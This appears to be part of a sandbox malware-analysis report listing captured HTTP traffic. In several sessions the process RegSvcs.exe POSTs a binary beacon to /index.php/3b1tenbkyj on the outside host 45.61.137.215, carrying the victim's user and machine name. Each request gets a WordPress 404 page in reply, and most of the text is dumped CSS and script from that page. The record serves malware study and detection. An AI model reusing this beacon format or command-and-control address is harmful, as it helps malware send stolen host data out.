                                            May 29, 2024 15:42:17.733547926 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:42:17.733557940 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:17.733570099 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:42:17.733580112 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:42:17.733597994 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.94971645.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:17.880991936 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:17.885970116 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:20.394320965 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:18 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:20.394346952 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:42:20.394360065 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:42:20.394371033 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:42:20.394383907 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:42:20.394393921 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:42:20.394406080 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                                            Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                                            May 29, 2024 15:42:20.394417048 CEST1000INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                                            Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                                            May 29, 2024 15:42:20.394431114 CEST1236INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63
                                            Data Ascii: --wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has
                                            May 29, 2024 15:42:20.394444942 CEST1236INData Raw: 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68
                                            Data Ascii: color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !importa


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.94971745.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:20.544811010 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:20.549853086 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:26.020756960 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:21 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:26.020812035 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:42:26.020824909 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:42:26.020839930 CEST224INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
                                            May 29, 2024 15:42:26.020953894 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:42:26.020979881 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:42:26.020993948 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:42:26.021027088 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:26.021039963 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:42:26.021079063 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.94972045.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:26.177150011 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:26.182188988 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:28.595372915 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:26 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:28.595396042 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:42:28.595407963 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
